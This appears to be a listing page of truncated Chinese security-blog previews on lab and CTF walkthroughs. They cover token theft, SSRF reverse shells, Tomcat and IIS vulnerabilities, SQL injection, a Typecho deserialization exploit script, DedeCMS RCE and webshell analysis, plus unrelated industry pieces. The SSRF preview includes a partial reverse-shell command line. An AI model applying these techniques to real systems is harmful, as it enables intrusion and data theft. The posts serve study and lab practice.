💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌💌 🔗Crypto 一、[签到]古典大杂烩 附件信息： 🐩👃🐪🐼👅🐯🐩👈👇👭👟👝🐺🐭👉👙👤👋👚🐪🐫👍👢👮👱🐼👢👨👠👭🐽🐰🐻👚👂👧👠👥👛👮👯👮👬🐾👐👛👌👚👞🐨👏👉👆🐿👆👘👇🐺👦🐸👃🐭👟👑👪👃👁🐻🐻👜🐧👇👊🐧🐾🐼👇🐫🐺👐👆👪🐼👋👌?...

Windows令牌窃取攻击 目录 Windows令牌窃取攻击 一、Windows令牌 二、令牌窃取攻击 1、通过CS进行令牌攻击 2、通过msf进行令牌攻击 一、Windows令牌 令牌（Token）是系统的临时密钥，相当于账户名和密码，用来决定是否允许这次请求和判断这次请求是属于哪一个用户的，它允许你在不提供密码或其他凭证的前提下，访问网络和系统资源，这些令牌持续存在系统中，除非系统重新启动。 Windows令牌种类： （1）访问令牌（AccessToken）表示访问控制操作主题的系统对象 （2）会话令牌（SessionToken）是交互会话中唯一的身份标识符 （3...

引子 前段时间参加了一个网络安全的线上培训，发现网安老师演示的FormatWorld靶场实例很有意思，作为小白的我忍不住记录下来。靶场需要我们逐步提权，最终get五个flag，涉及不少基础的渗透测试的工具和手段。喜欢的小伙伴点赞收藏支持一下。 准备环境（靶机和攻击机需使用NAT模式） 1.攻击机：kali(ip:192.168.208.135)。我的是kali-2021.3版本的，有点老，但不影响使用。2.靶机：FormatWorld(ip:192.168.208.138)。百度网盘下载链接：https://pan.baidu.com/s/1kmJzBJLXD4Kd9BAuQVSIFQ提取码：...

SSRF漏洞拓展 目录 SSRF漏洞拓展 curl_exec函数 一、ssrf配合gopher协议反弹shell 二、ssrf配合gopher协议写马 三、ssrf配合gopher协议ssh免密登录 四、ssrf配合dict协议反弹shell curl_exec函数 一、ssrf配合gopher协议反弹shell 实验环境： （1）192.168.142.201redis服务器 （2）192.168.142.133攻击机 （3）192.168.142.1SSRF靶机 1、利用定时任务构造反弹shell setxx"\nbash-i>&/dev/tcp/1...

网络安全在当今数字化时代变得越来越重要，每个人都应该对网络安全有一定的认知和保护意识。为了加强公众对网络安全的认知，我将在本文中介绍网络安全法的重要性，并提供一些实用的宣传教育措施来提高公众的网络安全意识。 1.网络安全法的背景和重要性 网络安全法是中国政府于2016年颁布的一项法律，旨在维护国家网络安全，保护公民的合法权益。它规定了网络安全的基本原则、网络运营者的责任和义务，以及网络安全的监管措施等内容。网络安全法的实施对于确保网络信息的安全，防止网络犯罪行为具有重要意义。 在当前，网络安全面临着各种威胁，如黑客攻击、数据泄露、网络诈骗等。公众对网络安全的认知和保护意识的提高，可以更好地保护...

目录 IIS_7.o/7.5解析漏洞 1.1、漏洞描述 1.2、漏洞等级 1.3、影响版本 1.4、漏洞复现 1、基础环境 2、漏洞扫描 3、漏洞验证 1.5、修复建议 IIS_7.o/7.5解析漏洞 说明 内容 漏洞编号 漏洞名称 IIS_7.o/7.5解析漏洞 漏洞评级 影响范围 win7,server2008 漏洞描述 修复方案 1.1、漏洞描述 漏洞原理： cgi.fix_path=1 1.png/.php 该漏洞不是由于代码或者框架引起，而是由于配置问题引起的漏洞 1.2、漏洞等级 1.3、影响版本 II...

9月2日至6日，2023年中国国际服务贸易交易会在北京举办。会上，天翼云“基于异构多云环境下的息壤算力网络调度实践”荣获2023年度“数智影响力”数字化转型创新案例；“基于天翼云4.0分布式云底座的云骁智能计算平台实践”和“基于异构多云环境下的息壤算力网络调度实践”获评“智赋百业”2023年人工智能融合发展与安全应用典型案例。天翼云科技有限公司副总经理黄洪波出席算力服务高质量发展论坛并发表演讲，分享了天翼云如何以领先算力服务助力数字中国建设。 云智一体夯实国云之基 推动普惠算力共享 随着人工智能技术的兴起，云服务面临着算力需求激增等新一轮的变化与挑战。天翼云作为云服务国家队，推进算力服务的升...

SQL注入—搜索型 搜索型注入—原理介绍 一些网站为了方便用户查找网站的资源，都对用户提供了搜索的功能，因为是搜索功能，往往是程序员在编写代码时都忽略了对其变量(参数)的过滤，而且这样的漏洞在国内的系统中普遍的存在; 其中又分为POST/GET，GET型的一般是用在网站上的搜索，而POST则用在用户名的登录，可以从form表单的method="get"属性来区分是get还是post。搜索型注入又称为文本框注入。 一般后台搜索组合的SQL语句如下: $sql="selectfromuserwherepasswordlike'%$pwd%'orderbypassword"; 这句SQL的语句就...

相关参数： 　　·Kali攻击机一台 　　·ENSP模拟器   拓扑图：      实验说明： 　　·通过配置DHCP_Server，使得192.168.150.0/24子网内的终端能够自动获取IP地址及DNS 　　·通过配置SW交换机，开启DHCPSnooping功能，用于保证DHCP客户端从合法的DHCP服务器获取IP地址 　　·Kali攻击机接入192.168.150.0/24内网中，获取内网IP地址，使用两种DHCP攻击方式并抓包进行分析(Wireshark)    实验步骤： 　　·Kali如何接入ENSP网络(Kali接...

目录 Tomcat_PUT方法任意写文件(CVE-2017-12615) 1.1、漏洞描述 1.2、漏洞等级 1.3、影响版本 1.4、漏洞复现 1、基础环境 2、漏洞扫描 3、漏洞验证 工具扫描验证 POC 1.6、修复建议 Tomcat_PUT方法任意写文件(CVE-2017-12615) 说明 内容 漏洞编号 CVE-2017-12615 漏洞名称 Tomcat_PUT方法任意写文件 漏洞评级 高危 影响范围 Tomcat版本：8.5.19 漏洞描述 漏洞本质Tomcat配置了可写（readonly=false），导致我们可...

一、什么是Web应用防火墙？ Web应用防火墙对网站、APP的业务流量安全及合规性保护，对业务流量的识别恶意特征提取、分析识别出恶意流量并进行处理，将正常安全的流量回源到业务服务器，保护网站核心业务和数据安全。 京东云Web应用防火墙的产品架构示意图如下： 二、Web攻击常见的检测手段？ Web攻击常见的三种检测手段，规则检测、AI检测或语义检测。 1.规则检测：效率高、识别精准度高。其表现形式是正则表达式，通过正则表达式或组合来检测攻击，例如：OWASPTop10十大安全漏洞，也有与其对应的规则集合owasptop10rulesset，通过规则拦截恶意攻击已经是各大厂商的主流检测手段。目前...

靶机地址:10.129.130.57 攻击机地址:10.10.14.185 端口扫描 nmap-sV-sC10.129.130.57 访问10.129.130.57,对一些可能有用的信息进行记录 打开burp,刷新网页,点击HTTPhistory，注意到/cdn-cgi/login/script.js 试着访问http://10.129.130.57/cdn-cgi/login/script.js，页面没有内容 访问http://10.129.130.57/cdn-cgi/login/，发现登录后台 帐号admin，试着进行弱密码爆破，但失败了 点击游客登录 对url的id...

前言 glibc2.35删除了malloc_hook、free_hook以及realloc_hook，通过劫持这三个hook函数执行system已经不可行了。 传统堆漏洞利用是利用任意地址写改上上述几个hook从而执行system，在移除之后则需要找到同样只需要修改某个地址值并且能够造成程序流劫持的效果。 __call_tls_dtors 在程序返回时会通过exit函数，exit函数会经历以下调用过程 exit -> __run_exit_handlers -> __call_tls_dtors 而__call_tls_dtors函数中则存在着可以进行劫持的地址，__call_tl...

引言 如果您仔细分析过任何一个网站的请求日志，您肯定会发现一些可疑的流量，那可能就是爬虫流量。根据Imperva发布的《2023ImpervaBadBotReport》在2022年的所有互联网流量中，47.4%是爬虫流量。与2021年的42.3%相比，增长了5.1%。在这些爬虫流量中，30.2%是恶意爬虫，比2021年的27.7%增长了2.5%。 从国内外公开的数据中可以得出，恶意爬虫几乎出现在各个行业，无论是传统行业、泛互联网，还是政企、金融等，都各种程度遭受着爬虫的攻击，并且爬虫流量还在逐年增长。 大部分正常的爬虫可以帮助我们提高生产力，而恶意的爬虫不仅会造成数据泄漏还会影响正常用户体验...

目录 漏洞利用 GetShell 下载链接：https://pan.baidu.com/s/1z0w7ret-uXHMuOZpGYDVlw提取码：lt7a Typecho-反序列化漏洞大佬代码分析 Typechoinstall.php存在的反序列化漏洞 首页 漏洞点：/install.php?finish= 漏洞利用 漏洞利用脚本phpinfo()信息 <?php //typecho_1.0(14.10.10)_unserialize_phpinfo.php classTypecho_Feed{ constRSS1='RSS1.0'; constRSS2...

由于Win10操作系统在配置L2tp连接时，经常遇到问题，可以使用华三自带的iNode进行配置连接，简单易用 华三路由器作为中心节点，在路由器上配置好L2tp信息后，直接使用iNode配置客户端工具进行连接 路由器上配置，参考 https://www.h3c.com/CN/D_201705/995158_30005_0.htm 配置客户端 先安装iNode管理工具，下载地址 https://www.h3c.com/cn/Service/Document_Software/Software_Download/IP_Management/iNode/iNode_PC/ 装好以后，使用管理工具制作...

云原生安全风险 随着云原生架构的快速发展，核心能力逐渐稳定，安全问题日趋紧急。在云原生安全领域不但有新技术带来的新风险，传统IT基础设施下的安全威胁也依然存在。要想做好云原生安全，就要从这两个方面分别进行分析和解决。 新技术带来新的安全风险 云原生的概念定义本身就比较抽象，从诞生到现在也经历了多次变化。2018年CNCF对云原生的概念进行了重定义：云原生技术有利于各组织在公有云、私有云和混合云等新型动态环境中，构建和运行可弹性扩展的应用。云原生的代表技术包括容器、服务网格、微服务、不可变基础设施和声明式API。虽然这是云原生概念最新的定义，但是不同的人对云原生的抽象概念理解相差很大，一直在不断...

前言 接之前写的一篇《DedecmsV110最新版RCE---Tricks》，既然利用远程文件下载方式成为了实现RCE的最好方法，毕竟在执行的时候没有恶意shell文件，恶意木马被存放于远端服务器，那么下文的day就是对远程恶意文件的利用。 环境 下载最新版本： https://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.110-UTF8.zip 影响版本： <=DedeCMS-V5.7.110 漏洞URL: /uploads/dede/article_string_mix.php /uploads/dede/sys_da...

前言 本次分析使用了ChatGPT进行辅助分析，大大提升了工作效率，很快就分析出木马的工作流程和构造出利用方式。 分析 首先对该木马进行格式化,以增强代码的可读性。得到如下代码 <jsp:rootxmlns:jsp="http://java.sun.com/JSP/Page"version="1.2">   <jsp:declaration>     Stringxc="3c6e0b8a9c15224a";     Stringpass="pass";  ...

sql="SELECTFROMusersWHEREid='id'LIMIT0,1"; 打开第一关，我们看到如下界面，上面写着PleaseinputtheIDasparameterwithnumericvalue，它的意思是让我们请输入ID作为带有数值的参数。 我们输入带有id的参数:http://127.0.0.1/sqli-labs/Less-1/?id=1，如下图，正确回显界面。 我们尝试加入and1=1(http://127.0.0.1/sqli-labs/Less-1/?id=1and1=1)，正确回显，然后我们将and1=1改为and1=2，发现正确回显，为字符型注入，即说明存在...